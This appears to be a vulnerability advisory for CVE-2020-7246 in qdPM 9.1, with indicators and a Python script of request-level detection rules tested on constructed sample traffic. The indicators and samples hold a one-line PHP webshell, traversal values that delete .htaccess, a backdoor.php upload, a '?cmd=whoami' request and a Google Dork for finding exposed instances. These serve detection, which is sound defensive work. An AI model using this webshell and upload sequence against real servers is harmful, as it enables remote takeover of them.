CVE-2020-7246
published 2020-01-21


Priority: P2 (77)
Severity: high, 8.8 (CVSS 3.1)
Vector: AV:N / AC:L / PR:L / UI:N / S:U / C:H / I:H / A:H
Exploit: public exploit flagged
EPSS: 83.23% (99.6th percentile)
A remote code execution (RCE) vulnerability exists in qdPM 9.1 and earlier. An attacker can upload a malicious PHP code file via the profile photo functionality, by leveraging a path traversal vulnerability in the users['photop_preview'] delete photo feature, allowing bypass of .htaccess protection. NOTE: this issue exists because of an incomplete fix for CVE-2015-3884.

Affected

1 range
Vendor: qdpm
Product: qdpm
Version range: <= 9.1
Fixed in: (not listed)

Detection & IOCs

path: /uploads/users/
path: index.php/myAccount/update
path: index.php/myAccount
filename: backdoor.php
filename: .htaccess
command: ?cmd=whoami
command: $cmd = ($_REQUEST['cmd']); system($cmd);
  • Detect path traversal in the users[photo_preview] POST parameter: values containing '../' sequences targeting .htaccess deletion are a strong indicator of CVE-2020-7246 exploitation.
  • Monitor POST requests to 'index.php/myAccount/update' that include a multipart file upload with a PHP file (Content-Type: application/octet-stream) as the users[photo] field.
  • Detect PHP webshell execution attempts via GET requests to '/uploads/users/*.php?cmd=': this path is where the malicious file lands after upload.
  • Use the Google Dork pattern as a hunting query to identify exposed qdPM 9.1 instances: intitle:qdPM 9.1. Copyright © 2020 qdpm.net
  • Uploaded PHP files in /uploads/users/ are renamed with a numeric prefix (e.g., 1584009-webshell.php). Alert on any .php file appearing under this directory.
  • Exploitation requires valid credentials for at least one non-admin user account. The designated admin account cannot be used because it lacks a myAccount page.
  • This CVE is an incomplete fix for CVE-2015-3884; installations that applied the prior patch may still be vulnerable if running qdPM 9.1 or earlier.
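The three request-level detections above (traversal in users[photo_preview], a PHP file uploaded as users[photo], and a cmd= request to a .php file under /uploads/users/) expressed as rules that run over captured HTTP requests. This is an added example, not code from the cvebase page or the qdPM project. It assumes request records of the shape a reverse proxy or WAF with body logging would produce (method, url, lower-cased headers, raw body); that layout, the hypothetical host qdpm.example.test, the traversal values and the sample traffic are all constructed here. The filesystem alert (any .php appearing under /uploads/users/) and the Google Dork hunt are out of scope for a request-based rule set.

```python
"""Request-level detection rules for CVE-2020-7246 exploitation attempts against qdPM.

Added example; not part of the cvebase page or of qdPM itself. Each request is a
dict: {"method", "url", "headers" (lower-case keys), "body"}. Sample traffic is constructed.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Extensions a typical PHP deployment would execute. The page names only .php;
# the extra aliases are an assumption added for defensive breadth.
PHP_EXTS = (".php", ".php3", ".php4", ".php5", ".phtml", ".phar")
TRAVERSAL_RE = re.compile(r"\.\.[/\\]")
# Multipart part header carrying the profile photo; captures the client-supplied filename.
PHOTO_PART_RE = re.compile(
    r'Content-Disposition:\s*form-data;\s*name="users\[photo\]";\s*filename="([^"]*)"',
    re.IGNORECASE,
)


def _decode(value: str, rounds: int = 3) -> str:
    """Unwrap repeated URL encoding so %252e%252e%252f is inspected as ../."""
    for _ in range(rounds):
        new = unquote(value)
        if new == value:
            break
        value = new
    return value


def check_photo_preview_traversal(req):
    """Rule 1: '../' inside users[photo_preview] posted to the myAccount update endpoint."""
    if req["method"] != "POST" or "index.php/myAccount" not in req["url"]:
        return None
    if not req["headers"].get("content-type", "").startswith("application/x-www-form-urlencoded"):
        return None
    params = parse_qs(req["body"], keep_blank_values=True)  # parse_qs already unquotes once
    for value in params.get("users[photo_preview]", []):
        decoded = _decode(value)
        if TRAVERSAL_RE.search(decoded):
            hits_htaccess = decoded.rstrip("/").endswith(".htaccess")
            return {"rule": "photo_preview_traversal",
                    "severity": "high" if hits_htaccess else "medium",
                    "value": decoded}
    return None


def check_php_photo_upload(req):
    """Rule 2: multipart POST to index.php/myAccount/update whose users[photo] part is a PHP file."""
    if req["method"] != "POST" or "index.php/myAccount/update" not in req["url"]:
        return None
    if not req["headers"].get("content-type", "").startswith("multipart/form-data"):
        return None
    m = PHOTO_PART_RE.search(req["body"])
    if m and m.group(1).lower().endswith(PHP_EXTS):
        return {"rule": "php_upload_via_users_photo", "severity": "high", "filename": m.group(1)}
    return None


def check_webshell_request(req):
    """Rule 3: request for a .php file under /uploads/users/, critical when it carries cmd=."""
    parts = urlsplit(req["url"])
    path = _decode(parts.path).lower()
    if "/uploads/users/" not in path or not path.endswith(PHP_EXTS):
        return None
    qs = parse_qs(parts.query, keep_blank_values=True)
    if "cmd" in qs:
        return {"rule": "uploads_users_webshell_exec", "severity": "critical",
                "path": parts.path, "cmd": qs["cmd"][0]}
    return {"rule": "php_under_uploads_users", "severity": "medium", "path": parts.path}


RULES = (check_photo_preview_traversal, check_php_photo_upload, check_webshell_request)


def run_rules(requests):
    """Apply every rule to every request; returns one hit dict per (request, rule) match."""
    hits = []
    for idx, req in enumerate(requests):
        for rule in RULES:
            hit = rule(req)
            if hit:
                hit["request"] = idx
                hits.append(hit)
    return hits


FORM = {"content-type": "application/x-www-form-urlencoded"}
MULTIPART = {"content-type": "multipart/form-data; boundary=b0undary"}
BASE = "http://qdpm.example.test"  # hypothetical host
# Constructed sample traffic: four exploitation steps followed by three benign requests.
SAMPLES = [
    {"method": "POST", "url": BASE + "/index.php/myAccount/update", "headers": FORM,
     "body": "users[name]=alice&users[photo_preview]=../.htaccess"},
    {"method": "POST", "url": BASE + "/index.php/myAccount/update", "headers": FORM,
     "body": "users[name]=alice&users[photo_preview]=%252e%252e%252f.htaccess"},
    {"method": "POST", "url": BASE + "/index.php/myAccount/update", "headers": MULTIPART,
     "body": ('--b0undary\r\nContent-Disposition: form-data; name="users[photo]"; '
              'filename="backdoor.php"\r\nContent-Type: application/octet-stream\r\n\r\n'
              "<?php $cmd = ($_REQUEST['cmd']); system($cmd); ?>\r\n--b0undary--\r\n")},
    {"method": "GET", "url": BASE + "/uploads/users/1584009-backdoor.php?cmd=whoami",
     "headers": {}, "body": ""},
    {"method": "POST", "url": BASE + "/index.php/myAccount/update", "headers": MULTIPART,
     "body": ('--b0undary\r\nContent-Disposition: form-data; name="users[photo]"; '
              'filename="me.jpg"\r\nContent-Type: image/jpeg\r\n\r\n\xff\xd8\r\n--b0undary--\r\n')},
    {"method": "POST", "url": BASE + "/index.php/myAccount/update", "headers": FORM,
     "body": "users[name]=alice&users[photo_preview]=1584001-me.jpg"},
    {"method": "GET", "url": BASE + "/uploads/users/1584001-me.jpg", "headers": {}, "body": ""},
]

if __name__ == "__main__":
    for hit in run_rules(SAMPLES):
        print(hit)
```

The double-decoding in rule 1 matters in practice: a traversal value encoded twice survives the single decode most log pipelines apply, so the rule unwraps until the string stops changing. Rule 3 raises a medium alert for any .php request under /uploads/users/ even without cmd=, since a legitimate profile photo should never be a PHP file.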

CVSS provenance

NVD, CVSS v3.1: 8.8 HIGH, CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
NVD, CVSS v2.0: 6.5 MEDIUM, AV:N/AC:L/Au:S/C:P/I:P/A:P